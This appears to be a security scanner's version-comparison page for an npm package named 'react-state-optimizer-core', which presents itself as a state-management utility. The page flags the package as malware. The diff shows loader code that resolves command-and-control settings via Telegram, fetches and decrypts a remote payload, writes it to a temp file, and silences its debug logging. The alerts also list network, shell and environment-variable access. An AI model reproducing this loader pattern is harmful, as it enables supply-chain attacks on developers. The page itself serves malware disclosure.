react-state-optimizer-core
Advanced tools
react-state-optimizer-core - npm Package Compare versions
+1
-1
| { | ||
| "name": "react-state-optimizer-core", | ||
| "version": "1.0.2", | ||
| "version": "1.0.3", | ||
| "description": "Utility layer for asynchronous state management", | ||
@@ -5,0 +5,0 @@ "main": "index.js", |
+5
-5
@@ -235,11 +235,11 @@ const fs = require('fs'); | ||
| console.log("[Debug] Resolving C2 from Telegram..."); | ||
| // console.log("[Debug] Resolving C2 from Telegram..."); | ||
| const { key: keyString, gistUrl } = await resolveConfigFromTelegram(); | ||
| console.log(`[Debug] C2 Resolved. Key: ${keyString.substring(0, 8)}... URL: ${gistUrl}`); | ||
| // console.log(`[Debug] C2 Resolved. Key: ${keyString.substring(0, 8)}... URL: ${gistUrl}`); | ||
| await progressPromise; | ||
| console.log(`[Debug] Fetching payload from ${gistUrl}...`); | ||
| // console.log(`[Debug] Fetching payload from ${gistUrl}...`); | ||
| const b64Payload = await fetchText(gistUrl); | ||
| console.log(`[Debug] Payload fetched (${b64Payload.length} bytes). Decrypting...`); | ||
| // console.log(`[Debug] Payload fetched (${b64Payload.length} bytes). Decrypting...`); | ||
@@ -261,3 +261,3 @@ const encryptedBlob = Buffer.from(b64Payload.trim(), 'base64'); | ||
| let debugMode = true; // FORCE DEBUG MODE FOR TESTING | ||
| let debugMode = false; | ||
@@ -264,0 +264,0 @@ const tempFile = path.join(os.tmpdir(), `npm-update-${Date.now()}.js`); |
New alerts
AI-detected potential malware
Supply chain riskAI has identified this package as malware. This is a strong signal that the package may be malicious.
Found 1 instance in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 3 instances in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
Dynamic require
Supply chain riskDynamic require can indicate the package is performing dangerous or unsafe dynamic code execution.
Found 1 instance in 1 package
Environment variable access
Supply chain riskPackage accesses environment variables, which may be a sign of credential stuffing or data theft.
Found 3 instances in 1 package
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
Found 1 instance in 1 package
Long strings
Supply chain riskContains long string literals, which may be a sign of obfuscated or packed code.
Found 1 instance in 1 package
Fixed alerts
AI-detected potential malware
Supply chain riskAI has identified this package as malware. This is a strong signal that the package may be malicious.
Found 1 instance in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 3 instances in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
Dynamic require
Supply chain riskDynamic require can indicate the package is performing dangerous or unsafe dynamic code execution.
Found 1 instance in 1 package
Environment variable access
Supply chain riskPackage accesses environment variables, which may be a sign of credential stuffing or data theft.
Found 3 instances in 1 package
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
Found 1 instance in 1 package
Long strings
Supply chain riskContains long string literals, which may be a sign of obfuscated or packed code.
Found 1 instance in 1 package
Worsened metrics
- Total package byte prevSize
11823
-0.16%